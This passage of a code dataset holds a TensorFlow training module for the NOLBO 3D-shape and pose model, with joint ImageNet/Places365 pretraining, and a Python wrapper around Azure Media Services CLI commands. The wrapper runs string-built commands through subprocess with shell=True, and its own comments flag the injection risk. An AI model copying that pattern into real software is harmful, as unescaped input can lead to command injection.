            loss_latent_kl = kl_loss(mean=mean, logVar=log_var, mean_target=mean_prior, logVar_target=log_var_prior)
            loss_inst_prior_reg = regulizer_loss(z_mean=inst_mean_prior, z_logVar=inst_log_var_prior,
                                                 dist_in_z_space=5.0 * 8, class_input=class_list)
            loss_class_prior_reg = regulizer_loss(z_mean=class_mean_prior, z_logVar=class_log_var_prior,
                                                  dist_in_z_space=5.0 * 8)
            # Average each loss over the global batch for distributed training.
            loss_sincos_kl = tf.nn.compute_average_loss(loss_sincos_kl, global_batch_size=self._GLOBAL_BATCH_SIZE)
            loss_sincos_mse = tf.nn.compute_average_loss(loss_sincos_mse, global_batch_size=self._GLOBAL_BATCH_SIZE)
            loss_sincos_1 = tf.nn.compute_average_loss(loss_sincos_1, global_batch_size=self._GLOBAL_BATCH_SIZE)
            loss_shape = tf.nn.compute_average_loss(loss_shape, global_batch_size=self._GLOBAL_BATCH_SIZE)
            loss_latent_kl = tf.nn.compute_average_loss(loss_latent_kl, global_batch_size=self._GLOBAL_BATCH_SIZE)
            loss_prior_reg = tf.nn.compute_average_loss(loss_inst_prior_reg+loss_class_prior_reg, global_batch_size=self._GLOBAL_BATCH_SIZE)
            # Weighted sum of all objectives (weights are empirical).
            total_loss = (
                loss_sincos_kl + 100.0 * loss_sincos_mse + 1000.0 * loss_sincos_1
                + loss_shape
                + loss_latent_kl
                + 0.01 * loss_prior_reg
            )
        trainable_variables = self._encoder_backbone.trainable_variables + self._encoder_head.trainable_variables \
                              + self._decoder.trainable_variables + self._priornet_inst.trainable_variables + self._priornet_cl.trainable_variables
        grads = tape.gradient(total_loss, trainable_variables)
        self._optimizer.apply_gradients(zip(grads, trainable_variables))
        # Voxel-wise precision / recall for monitoring reconstruction quality.
        TP, FP, FN = voxelPrecisionRecall(xTarget=output_images_gt, xPred=output_images)
        pr = tf.nn.compute_average_loss(TP / (TP + FP + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE)
        rc = tf.nn.compute_average_loss(TP / (TP + FN + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE)
        return loss_sincos_kl, loss_sincos_mse, loss_sincos_1,\
               loss_shape, loss_latent_kl, loss_prior_reg,\
               pr, rc
    def distributed_fit(self, inputs):
        """Run fit() on every replica and SUM-reduce the returned scalars."""
        sckl, scmse, sc1, s, lkl, reg, pr, rc = self._strategy.run(self.fit, args=(inputs,))
        sckl = self._strategy.reduce(tf.distribute.ReduceOp.SUM, sckl, axis=None)
        scmse = self._strategy.reduce(tf.distribute.ReduceOp.SUM, scmse, axis=None)
        sc1 = self._strategy.reduce(tf.distribute.ReduceOp.SUM, sc1, axis=None)
        s = self._strategy.reduce(tf.distribute.ReduceOp.SUM, s, axis=None)
        lkl = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lkl, axis=None)
        reg = self._strategy.reduce(tf.distribute.ReduceOp.SUM, reg, axis=None)
        pr = self._strategy.reduce(tf.distribute.ReduceOp.SUM, pr, axis=None)
        rc = self._strategy.reduce(tf.distribute.ReduceOp.SUM, rc, axis=None)
        return sckl, scmse, sc1, s, lkl, reg, pr, rc
    def saveEncoderBackbone(self, save_path):
        """Save backbone weights under a fixed file name in *save_path*."""
        file_name = 'nolbo_encoder_backbone'
        self._encoder_backbone.save_weights(os.path.join(save_path, file_name))
    def saveEncoderHead(self, save_path):
        """Save encoder-head weights under a fixed file name in *save_path*."""
        file_name = 'nolbo_encoder_head'
        self._encoder_head.save_weights(os.path.join(save_path, file_name))
    def saveEncoder(self, save_path):
        """Save backbone and head weights."""
        self.saveEncoderBackbone(save_path=save_path)
        self.saveEncoderHead(save_path=save_path)
    def saveDecoder(self, save_path):
        """Save decoder weights; file name comes from the structure dict."""
        file_name = self._dec_str['name']
        self._decoder.save_weights(os.path.join(save_path, file_name))
    def savePriornet(self, save_path):
        """Save both priornets; file names come from the structure dicts."""
        file_name_inst = self._prior_inst_str['name']
        file_name_class = self._prior_cl_str['name']
        self._priornet_inst.save_weights(os.path.join(save_path, file_name_inst))
        self._priornet_cl.save_weights(os.path.join(save_path, file_name_class))
    def saveModel(self, save_path):
        """Save all sub-models (encoder, decoder, priornets)."""
        self.saveEncoder(save_path=save_path)
        self.saveDecoder(save_path=save_path)
        self.savePriornet(save_path=save_path)
    def loadEncoderBackbone(self, load_path, file_name=None):
        """Load backbone weights; *file_name* defaults to the save name."""
        if file_name == None:
            file_name = 'nolbo_encoder_backbone'
        self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
    def loadEncoderHead(self, load_path, file_name=None):
        """Load encoder-head weights; *file_name* defaults to the save name."""
        if file_name == None:
            file_name = 'nolbo_encoder_head'
        self._encoder_head.load_weights(os.path.join(load_path, file_name))
    def loadEncoder(self, load_path):
        """Load backbone and head weights."""
        self.loadEncoderBackbone(load_path=load_path)
        self.loadEncoderHead(load_path=load_path)
    def loadDecoder(self, load_path, file_name=None):
        """Load decoder weights; *file_name* defaults to the structure name."""
        if file_name == None:
            file_name = self._dec_str['name']
        self._decoder.load_weights(os.path.join(load_path, file_name))
    def loadPriornet(self, load_path, file_name=None):
        """Load both priornets.

        NOTE(review): the *file_name* parameter is accepted but unused; the
        structure-dict names are always used.
        """
        file_name_inst = self._prior_inst_str['name']
        file_name_class = self._prior_cl_str['name']
        self._priornet_inst.load_weights(os.path.join(load_path, file_name_inst))
        self._priornet_cl.load_weights(os.path.join(load_path, file_name_class))
    def loadModel(self, load_path):
        """Load all sub-models (encoder, decoder, priornets)."""
        self.loadEncoder(load_path=load_path)
        self.loadDecoder(load_path=load_path)
        self.loadPriornet(load_path=load_path)
    def _getEV(self, sin, cos, radLogVar):
        """Return E[sin], E[cos] and log-variances of sin/cos for an angle
        with Gaussian noise of log-variance *radLogVar*."""
        Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
        Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
        Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
            -tf.exp(radLogVar)) * sin * sin
        Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
            -tf.exp(radLogVar)) * cos * cos
        logVarsin = tf.math.log(Varsin + 1e-7)
        logVarcos = tf.math.log(Varcos + 1e-7)
        return Esin, Ecos, logVarsin, logVarcos
    def _poseLoss(self, sin_gt, cos_gt, rad_var_gt, sin, cos, rad_log_var):
        """Pose losses for predicted sin/cos with predicted uncertainty.

        Returns:
            (KL term between predicted and GT sin/cos distributions,
             MSE-style term weighted by GT variances,
             unit-norm regulariser penalising sin^2 + cos^2 != 1).
        """
        Esin_gt, Ecos_gt, log_var_sin_gt, log_var_cos_gt = self._getEV(
            sin=sin_gt, cos=cos_gt, radLogVar=tf.math.log(rad_var_gt+1e-7))
        Esin_pr, Ecos_pr, log_var_sin_pr, log_var_cos_pr = self._getEV(
            sin=sin, cos=cos, radLogVar=rad_log_var)
        loss_sin_kl = kl_loss(mean=Esin_pr, logVar=log_var_sin_pr, mean_target=Esin_gt, logVar_target=log_var_sin_gt)
        loss_cos_kl = kl_loss(mean=Ecos_pr, logVar=log_var_cos_pr, mean_target=Ecos_gt, logVar_target=log_var_cos_gt)
        # Samples from the predicted sin/cos distributions.
        sinz = sampling(mu=Esin_pr, logVar=log_var_sin_pr)
        cosz = sampling(mu=Ecos_pr, logVar=log_var_cos_pr)
        loss_sincos_mse = tf.square(sin_gt - sin)/tf.exp(log_var_sin_gt) \
                          + tf.square(cos_gt - cos)/tf.exp(log_var_cos_gt) \
                          + tf.square(rad_log_var - tf.math.log(rad_var_gt+1e-9)) \
                          + tf.square(sin_gt - sinz) + tf.square(cos_gt - cosz)
        # + tf.square(Esin_gt - Esin_pr) + tf.square(Ecos_gt - Ecos_pr) \
        # + tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile)+ tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
        # self._loss_sincos_mse = tf.square(self._ori_sin_gt_tile - self._ori_sin_mean_tile) \
        #                         + tf.square(self._ori_cos_gt_tile - self._ori_cos_mean_tile) \
        #                         + tf.square(self._rad_log_var_tile - tf.math.log(self._rad_var+1e-9))
        loss_sincos_1 = tf.square(tf.square(sin)+tf.square(cos) - 1.0)
        return loss_sin_kl + loss_cos_kl, loss_sincos_mse, loss_sincos_1
class pretrain_integrated(object):
    """Joint pretraining of one shared backbone on three tasks.

    Trains ImageNet classification, Places365 classification and the NOLBO
    single-object objective simultaneously; each task has its own head on
    top of the shared ``encoder_backbone``.  All models are created inside a
    ``tf.distribute`` strategy scope and optimised jointly with Adam.
    """
    def __init__(self,
                 backbone_style=None,
                 encoder_backbone=None,
                 decoder_structure=None,
                 prior_class_structure=None,
                 prior_inst_structure=None,
                 BATCH_SIZE_PER_REPLICA_nolbo=32,
                 BATCH_SIZE_PER_REPLICA_classifier=64,
                 strategy=None,
                 learning_rate = 1e-4
                 ):
        self._encoder_backbone = encoder_backbone
        self._backbone_style = backbone_style
        # Fixed orientation variance prior: (15 degrees in radians) squared.
        self._rad_var = (15.0/180.0 * 3.141593) ** 2
        self._dec_str = decoder_structure
        self._prior_cl_str = prior_class_structure
        self._prior_inst_str = prior_inst_structure
        # NOTE(review): strategy is required (num_replicas_in_sync is read
        # below); passing strategy=None raises AttributeError.
        self._strategy = strategy
        self._GLOBAL_BATCH_SIZE_nolbo = BATCH_SIZE_PER_REPLICA_nolbo * self._strategy.num_replicas_in_sync
        self._GLOBAL_BATCH_SIZE_classifier = BATCH_SIZE_PER_REPLICA_classifier * self._strategy.num_replicas_in_sync
        with self._strategy.scope():
            self._buildModel()
            self._optimizer = tf.keras.optimizers.Adam(learning_rate=learning_rate)
    def _buildModel(self):
        """Create the backbone (if not supplied), the three task heads, the
        3D decoder and the two prior networks."""
        print('build models....')
        if self._encoder_backbone is None:
            self._encoder_backbone = self._backbone_style(name='backbone', activation='elu')
        # ================================= set classifier heads
        self._encoder_head_imagenet = darknet.head2D(name='head_imagenet',
                                                     input_shape=self._encoder_backbone.output_shape[1:],
                                                     output_dim=1000,
                                                     filter_num_list=[],
                                                     filter_size_list=[],
                                                     last_pooling='max', activation='elu')
        # BUG FIX: this head was constructed with name='head_imagenet'
        # (copy-paste), colliding with the ImageNet head above; save/load
        # already use 'head_place365' for its weight files.
        self._encoder_head_place365 = darknet.head2D(name='head_place365',
                                                     input_shape=self._encoder_backbone.output_shape[1:],
                                                     output_dim=365,
                                                     filter_num_list=[],
                                                     filter_size_list=[],
                                                     last_pooling='max', activation='elu')
        # ==============set NOLBO encoder head
        # Output layout (see fit()): 8 inst mean + 8 inst logvar +
        # 8 class mean + 8 class logvar + 3 sin + 3 cos + 3 rad logvar.
        self._encoder_head_nolbo = darknet.head2D(name='head_nolbo',
                                                  input_shape=self._encoder_backbone.output_shape[1:],
                                                  output_dim=(2*3+3 + 2*(8+8)),
                                                  filter_num_list=[1024, 1024, 1024],
                                                  filter_size_list=[3, 3, 3],
                                                  last_pooling='max', activation='elu')
        # ==============set decoder3D
        self._decoder = ae3D.decoder3D(structure=self._dec_str)
        self._priornet_cl = priornet.priornet(structure=self._prior_cl_str)
        self._priornet_inst = priornet.priornet(structure=self._prior_inst_str)
        print('done')
    def _lossObject(self, y_target, y_pred):
        """Softmax cross-entropy between one-hot *y_target* and logits
        *y_pred*, averaged over the global classifier batch."""
        y_pred = tf.nn.softmax(y_pred)
        loss = -tf.reduce_sum(y_target * tf.math.log(y_pred + 1e-9), axis=-1)
        return tf.nn.compute_average_loss(loss, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier)
    def _evaluation(self, y_target, y_pred):
        """Return (top-1 accuracy, top-5 accuracy) averaged over the global
        classifier batch."""
        gt = tf.argmax(y_target, axis=-1)
        pr = tf.argmax(y_pred, axis=-1)
        equality = tf.equal(pr, gt)
        acc_top1 = tf.cast(equality, tf.float32)
        acc_top5 = tf.cast(
            tf.math.in_top_k(
                predictions=y_pred,
                targets=gt, k=5
            ),
            tf.float32)
        return tf.nn.compute_average_loss(
            acc_top1, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier
        ), tf.nn.compute_average_loss(
            acc_top5, global_batch_size=self._GLOBAL_BATCH_SIZE_classifier
        )
    def fit(self, inputs_imagenet, inputs_place365, inputs_nolbo):
        """One joint training step over the three tasks.

        Args:
            inputs_imagenet: (images, one-hot labels) for ImageNet.
            inputs_place365: (images, one-hot labels) for Places365.
            inputs_nolbo: (class one-hots, instance one-hots, GT sin, GT cos,
                input images, GT output voxel images).

        Returns:
            Per-replica scalars: both classifier losses, top-1 and top-5
            accuracies for each classifier, pose MSE loss, shape loss, and
            voxel precision / recall.
        """
        input_images_imagenet, class_list_imagenet = inputs_imagenet
        input_images_place365, class_list_place365 = inputs_place365
        class_list, inst_list, sin_gt, cos_gt, input_images, output_images_gt = inputs_nolbo
        with tf.GradientTape() as tape:
            # Classifier branches share the backbone.
            class_list_imagenet_pred = self._encoder_head_imagenet(self._encoder_backbone(input_images_imagenet, training=True), training=True)
            pred_loss_imagenet = self._lossObject(y_target=class_list_imagenet, y_pred=class_list_imagenet_pred)
            class_list_place365_pred = self._encoder_head_place365(self._encoder_backbone(input_images_place365, training=True), training=True)
            pred_loss_place365 = self._lossObject(y_target=class_list_place365, y_pred=class_list_place365_pred)
            # NOLBO branch: slice the flat head output into latent/pose stats.
            enc_output = self._encoder_head_nolbo(self._encoder_backbone(input_images, training=True), training=True)
            inst_mean = enc_output[..., :8]
            inst_log_var = enc_output[..., 8:16]
            class_mean = enc_output[..., 16:16+8]
            class_log_var = enc_output[..., 16+8:16+16]
            sin_mean = tf.tanh(enc_output[..., 16+16: 16+16+3])
            cos_mean = tf.tanh(enc_output[..., 16+16+3:16+16+3+3])
            rad_log_var = enc_output[..., 16+16+3+3:]
            mean = tf.concat([inst_mean, class_mean], axis=-1)
            log_var = tf.concat([inst_log_var, class_log_var], axis=-1)
            # Reparameterised sample from the predicted latent distribution.
            latents = sampling(mu=mean, logVar=log_var)
            loss_sincos_kl, loss_sincos_mse, loss_sincos_1 = self._poseLoss(
                sin_gt=sin_gt, cos_gt=cos_gt, rad_var_gt=self._rad_var,
                sin=sin_mean, cos=cos_mean, rad_log_var=rad_log_var)
            # Priors conditioned on the class (and instance) one-hot vectors.
            inst_mean_prior, inst_log_var_prior = self._priornet_inst(tf.concat([class_list, inst_list], axis=-1), training=True)
            class_mean_prior, class_log_var_prior = self._priornet_cl(class_list, training=True)
            mean_prior = tf.concat([inst_mean_prior, class_mean_prior], axis=-1)
            log_var_prior = tf.concat([inst_log_var_prior, class_log_var_prior], axis=-1)
            output_images = self._decoder(latents, training=True)
            loss_shape = binary_loss(xPred=output_images, xTarget=output_images_gt, gamma=0.60)
            loss_latent_kl = kl_loss(mean=mean, logVar=log_var, mean_target=mean_prior, logVar_target=log_var_prior)
            loss_inst_prior_reg = regulizer_loss(z_mean=inst_mean_prior, z_logVar=inst_log_var_prior,
                                                 dist_in_z_space=5.0 * 8, class_input=class_list)
            loss_class_prior_reg = regulizer_loss(z_mean=class_mean_prior, z_logVar=class_log_var_prior,
                                                  dist_in_z_space=5.0 * 8)
            # Average each NOLBO loss over the global NOLBO batch.
            loss_sincos_kl = tf.nn.compute_average_loss(loss_sincos_kl, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            loss_sincos_mse = tf.nn.compute_average_loss(loss_sincos_mse, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            loss_sincos_1 = tf.nn.compute_average_loss(loss_sincos_1, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            loss_shape = tf.nn.compute_average_loss(loss_shape, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            loss_latent_kl = tf.nn.compute_average_loss(loss_latent_kl, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            loss_prior_reg = tf.nn.compute_average_loss(loss_inst_prior_reg+loss_class_prior_reg, global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
            # Weighted sum of all objectives (weights are empirical).
            total_loss = (
                pred_loss_imagenet
                + pred_loss_place365
                + loss_sincos_kl + 100.0 * loss_sincos_mse + 1000.0 * loss_sincos_1
                + loss_shape
                + loss_latent_kl
                + 0.01 * loss_prior_reg
            )
        trainable_variables = self._encoder_backbone.trainable_variables\
                              + self._encoder_head_imagenet.trainable_variables + self._encoder_head_place365.trainable_variables + self._encoder_head_nolbo.trainable_variables \
                              + self._decoder.trainable_variables + self._priornet_inst.trainable_variables + self._priornet_cl.trainable_variables
        grads = tape.gradient(total_loss, trainable_variables)
        self._optimizer.apply_gradients(zip(grads, trainable_variables))
        acc_top1_imagenet, acc_top5_imagenet = self._evaluation(y_target=class_list_imagenet, y_pred=class_list_imagenet_pred)
        acc_top1_place365, acc_top5_place365 = self._evaluation(y_target=class_list_place365, y_pred=class_list_place365_pred)
        # Voxel-wise precision / recall for monitoring reconstruction quality.
        TP, FP, FN = voxelPrecisionRecall(xTarget=output_images_gt, xPred=output_images)
        pr = tf.nn.compute_average_loss(TP / (TP + FP + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
        rc = tf.nn.compute_average_loss(TP / (TP + FN + 1e-10), global_batch_size=self._GLOBAL_BATCH_SIZE_nolbo)
        return pred_loss_imagenet, pred_loss_place365, acc_top1_imagenet, acc_top1_place365, \
               acc_top5_imagenet, acc_top5_place365, loss_sincos_mse, loss_shape, pr, rc
    def distributed_fit(self, inputs_imagenet, inputs_place365, inputs_nolbo):
        """Run fit() on every replica and SUM-reduce the returned scalars."""
        limage, lplace, t1image, t1place, t5image, t5place, lscmse, lshape, pr, rc = self._strategy.run(self.fit, args=(inputs_imagenet, inputs_place365, inputs_nolbo,))
        limage = self._strategy.reduce(tf.distribute.ReduceOp.SUM, limage, axis=None)
        lplace = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lplace, axis=None)
        t1image = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t1image, axis=None)
        t1place = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t1place, axis=None)
        t5image = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t5image, axis=None)
        t5place = self._strategy.reduce(tf.distribute.ReduceOp.SUM, t5place, axis=None)
        lscmse = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lscmse, axis=None)
        lshape = self._strategy.reduce(tf.distribute.ReduceOp.SUM, lshape, axis=None)
        pr = self._strategy.reduce(tf.distribute.ReduceOp.SUM, pr, axis=None)
        rc = self._strategy.reduce(tf.distribute.ReduceOp.SUM, rc, axis=None)
        return limage, lplace, t1image, t1place, t5image, t5place, lscmse, lshape, pr, rc
    def saveEncoderBackbone(self, save_path):
        """Save backbone weights under a fixed file name in *save_path*."""
        file_name = 'backbone'
        self._encoder_backbone.save_weights(os.path.join(save_path, file_name))
    def saveEncoderHead(self, save_path):
        """Save all three task-head weight files."""
        self._encoder_head_imagenet.save_weights(os.path.join(save_path, 'head_imagenet'))
        self._encoder_head_place365.save_weights(os.path.join(save_path, 'head_place365'))
        self._encoder_head_nolbo.save_weights(os.path.join(save_path, 'head_nolbo'))
    def saveEncoder(self, save_path):
        """Save backbone and all heads."""
        self.saveEncoderBackbone(save_path=save_path)
        self.saveEncoderHead(save_path=save_path)
    def saveDecoder(self, save_path):
        """Save decoder weights; file name comes from the structure dict."""
        file_name = self._dec_str['name']
        self._decoder.save_weights(os.path.join(save_path, file_name))
    def savePriornet(self, save_path):
        """Save both priornets; file names come from the structure dicts."""
        file_name_inst = self._prior_inst_str['name']
        file_name_class = self._prior_cl_str['name']
        self._priornet_inst.save_weights(os.path.join(save_path, file_name_inst))
        self._priornet_cl.save_weights(os.path.join(save_path, file_name_class))
    def saveModel(self, save_path):
        """Save all sub-models (encoder, decoder, priornets)."""
        self.saveEncoder(save_path=save_path)
        self.saveDecoder(save_path=save_path)
        self.savePriornet(save_path=save_path)
    def loadEncoderBackbone(self, load_path, file_name=None):
        """Load backbone weights; *file_name* defaults to the save name."""
        if file_name is None:
            file_name = 'backbone'
        self._encoder_backbone.load_weights(os.path.join(load_path, file_name))
    def loadEncoderHead(self, load_path):
        """Load all three task-head weight files."""
        self._encoder_head_imagenet.load_weights(os.path.join(load_path, 'head_imagenet'))
        self._encoder_head_place365.load_weights(os.path.join(load_path, 'head_place365'))
        self._encoder_head_nolbo.load_weights(os.path.join(load_path, 'head_nolbo'))
    def loadEncoder(self, load_path):
        """Load backbone and all heads."""
        self.loadEncoderBackbone(load_path=load_path)
        self.loadEncoderHead(load_path=load_path)
    def loadDecoder(self, load_path, file_name=None):
        """Load decoder weights; *file_name* defaults to the structure name."""
        if file_name is None:
            file_name = self._dec_str['name']
        self._decoder.load_weights(os.path.join(load_path, file_name))
    def loadPriornet(self, load_path, file_name=None):
        """Load both priornets.

        NOTE(review): the *file_name* parameter is accepted but unused
        (kept for interface compatibility); the structure-dict names are
        always used.
        """
        file_name_inst = self._prior_inst_str['name']
        file_name_class = self._prior_cl_str['name']
        self._priornet_inst.load_weights(os.path.join(load_path, file_name_inst))
        self._priornet_cl.load_weights(os.path.join(load_path, file_name_class))
    def loadModel(self, load_path):
        """Load all sub-models (encoder, decoder, priornets)."""
        self.loadEncoder(load_path=load_path)
        self.loadDecoder(load_path=load_path)
        self.loadPriornet(load_path=load_path)
    def _getEV(self, sin, cos, radLogVar):
        """Return E[sin], E[cos] and log-variances of sin/cos for an angle
        with Gaussian noise of log-variance *radLogVar*."""
        Esin = tf.exp(-tf.exp(radLogVar) / 2.0) * sin
        Ecos = tf.exp(-tf.exp(radLogVar) / 2.0) * cos
        Varsin = 0.5 - 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (1.0 - 2.0 * sin * sin) - tf.exp(
            -tf.exp(radLogVar)) * sin * sin
        Varcos = 0.5 + 0.5 * tf.exp(-2.0 * tf.exp(radLogVar)) * (2.0 * cos * cos - 1.0) - tf.exp(
            -tf.exp(radLogVar)) * cos * cos
        logVarsin = tf.math.log(Varsin + 1e-7)
        logVarcos = tf.math.log(Varcos + 1e-7)
        return Esin, Ecos, logVarsin, logVarcos
    def _poseLoss(self, sin_gt, cos_gt, rad_var_gt, sin, cos, rad_log_var):
        """Pose losses for predicted sin/cos with predicted uncertainty.

        NOTE(review): uses epsilon 1e-9 inside log while the sibling
        nolbo_single._poseLoss uses 1e-7 — possibly unintentional drift.

        Returns:
            (KL term between predicted and GT sin/cos distributions,
             MSE-style term weighted by GT variances,
             unit-norm regulariser penalising sin^2 + cos^2 != 1).
        """
        Esin_gt, Ecos_gt, log_var_sin_gt, log_var_cos_gt = self._getEV(
            sin=sin_gt, cos=cos_gt, radLogVar=tf.math.log(rad_var_gt+1e-9))
        Esin_pr, Ecos_pr, log_var_sin_pr, log_var_cos_pr = self._getEV(
            sin=sin, cos=cos, radLogVar=rad_log_var)
        loss_sin_kl = kl_loss(mean=Esin_pr, logVar=log_var_sin_pr, mean_target=Esin_gt, logVar_target=log_var_sin_gt)
        loss_cos_kl = kl_loss(mean=Ecos_pr, logVar=log_var_cos_pr, mean_target=Ecos_gt, logVar_target=log_var_cos_gt)
        # Samples from the predicted sin/cos distributions.
        sinz = sampling(mu=Esin_pr, logVar=log_var_sin_pr)
        cosz = sampling(mu=Ecos_pr, logVar=log_var_cos_pr)
        loss_sincos_mse = tf.square(sin_gt - sin)/tf.exp(log_var_sin_gt) \
                          + tf.square(cos_gt - cos)/tf.exp(log_var_cos_gt) \
                          + tf.square(rad_log_var - tf.math.log(rad_var_gt+1e-9)) \
                          + tf.square(sin_gt - sinz) + tf.square(cos_gt - cosz)
        loss_sincos_1 = tf.square(tf.square(sin)+tf.square(cos) - 1.0)
        return loss_sin_kl + loss_cos_kl, loss_sincos_mse, loss_sincos_1
| 56.309613
| 190
| 0.631119
| 12,718
| 90,208
| 4.088379
| 0.037899
| 0.027541
| 0.004096
| 0.006193
| 0.923283
| 0.900204
| 0.868432
| 0.838891
| 0.821967
| 0.811389
| 0
| 0.033387
| 0.235655
| 90,208
| 1,601
| 191
| 56.344785
| 0.720725
| 0.155408
| 0
| 0.741409
| 0
| 0
| 0.017131
| 0.00058
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095361
| false
| 0
| 0.005155
| 0.001718
| 0.122852
| 0.006873
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82e2a834ce1d6730f356acd4dd896f100b74bf59
| 2,565
|
py
|
Python
|
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/ams/content_key_policy/option/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from .... pyaz_utils import get_cli_name, get_params
def add(resource_group, account_name, name, policy_option_name, clear_key_configuration=None, open_restriction=None, issuer=None, audience=None, token_key=None, token_key_type=None, alt_symmetric_token_keys=None, alt_rsa_token_keys=None, alt_x509_token_keys=None, token_claims=None, token_type=None, open_id_connect_discovery_document=None, widevine_template=None, ask=None, fair_play_pfx_password=None, fair_play_pfx=None, rental_and_lease_key_type=None, rental_duration=None, play_ready_template=None, fp_playback_duration_seconds=None, fp_storage_duration_seconds=None):
    """Run ``az ams content-key-policy option add`` and return parsed JSON.

    Raises:
        Exception: carrying the CLI's stderr when the command produced no
            stdout (i.e. it failed).
    """
    params = get_params(locals())
    # SECURITY NOTE(review): the command is executed via shell=True without
    # escaping parameter values; untrusted input could inject shell commands.
    command = "az ams content-key-policy option add " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        # BUG FIX: removed unreachable print() statements that followed the
        # return/raise in the original.
        raise Exception(stderr)
def remove(resource_group, account_name, name, policy_option_id):
    """Run ``az ams content-key-policy option remove`` and return parsed JSON.

    Raises:
        Exception: carrying the CLI's stderr when the command produced no
            stdout (i.e. it failed).
    """
    params = get_params(locals())
    # SECURITY NOTE(review): the command is executed via shell=True without
    # escaping parameter values; untrusted input could inject shell commands.
    command = "az ams content-key-policy option remove " + params
    print(command)
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    else:
        # BUG FIX: removed unreachable print() statements that followed the
        # return/raise in the original.
        raise Exception(stderr)
def update(resource_group, account_name, name, policy_option_id, policy_option_name=None, issuer=None, audience=None, token_key=None, token_key_type=None, add_alt_token_key=None, add_alt_token_key_type=None, token_claims=None, token_type=None, open_id_connect_discovery_document=None, widevine_template=None, ask=None, fair_play_pfx_password=None, fair_play_pfx=None, rental_and_lease_key_type=None, rental_duration=None, play_ready_template=None, fp_playback_duration_seconds=None, fp_storage_duration_seconds=None):
    """Run `az ams content-key-policy option update` with the given arguments.

    All parameters are forwarded to the CLI via get_params(locals()).

    Returns:
        The CLI's stdout parsed as JSON.

    Raises:
        Exception: with the CLI's stderr text when the command produced no stdout.
    """
    params = get_params(locals())
    command = "az ams content-key-policy option update " + params
    print(command)
    # NOTE(review): shell=True on a string-built command is injection-prone if any
    # argument contains shell metacharacters — confirm get_params() quotes values.
    output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout = output.stdout.decode("utf-8")
    stderr = output.stderr.decode("utf-8")
    if stdout:
        return json.loads(stdout)
    # Original had unreachable print() statements after return/raise; removed as dead code.
    raise Exception(stderr)
| 55.76087
| 573
| 0.749318
| 358
| 2,565
| 5.100559
| 0.215084
| 0.03943
| 0.032859
| 0.032859
| 0.882256
| 0.864732
| 0.864732
| 0.842826
| 0.796824
| 0.796824
| 0
| 0.004125
| 0.149318
| 2,565
| 45
| 574
| 57
| 0.832722
| 0
| 0
| 0.804878
| 0
| 0
| 0.05731
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073171
| false
| 0.04878
| 0.04878
| 0
| 0.195122
| 0.219512
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7dcf60f808360f183725825d1c8c10205bec1fde
| 627
|
py
|
Python
|
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | null | null | null |
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | null | null | null |
tf/002_conv2d.py
|
deep-learning/facenet
|
e74cf7c2a29477ed76cd34e243f993090c6f6987
|
[
"MIT"
] | 1
|
2021-09-28T09:20:31.000Z
|
2021-09-28T09:20:31.000Z
|
